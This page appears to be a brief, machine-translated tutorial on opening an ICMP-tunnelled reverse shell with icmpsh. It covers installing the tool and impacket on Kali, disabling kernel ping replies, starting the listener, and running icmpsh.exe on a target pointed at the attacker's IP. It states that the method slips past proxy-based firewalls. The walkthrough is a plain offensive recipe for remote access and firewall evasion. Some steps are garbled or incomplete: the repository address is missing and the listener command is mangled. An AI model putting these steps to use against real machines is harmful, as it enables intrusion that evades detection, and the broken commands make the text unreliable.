Use icmpsh to establish icmp tunnel rebound shell

Category: Tags: ,

First install the icmpsh software on kali, the software address is

We can clone directly with git git clone

Then we also need to install the python-impacket library to ensure access to TCP, UDP, ICMP and other protocols

pip2 install impacket

Next, we also need to close our previous ping command response program, so as to prevent the kernel from responding to ping packets.

sysctl -w net.ipv4.icmp_echo_ignore_all=1

After the experiment is completed, turn on the system ping, then change the last 1 to 0

Then you can start listening on kali

python native ip target ip

Then transfer icmpsh.exe to the target machine

icmpsh.exe -t -t followed by the attacker’s ip address and press Enter

Shell is received. Since data is transmitted through the network layer using PING request/reply messages, there is no need to specify a service or port. This kind of traffic cannot be detected by proxy-based firewalls, so some firewall rules may be bypassed in this way.



There are no reviews yet.

Be the first to review “Use icmpsh to establish icmp tunnel rebound shell”

Your email address will not be published. Required fields are marked *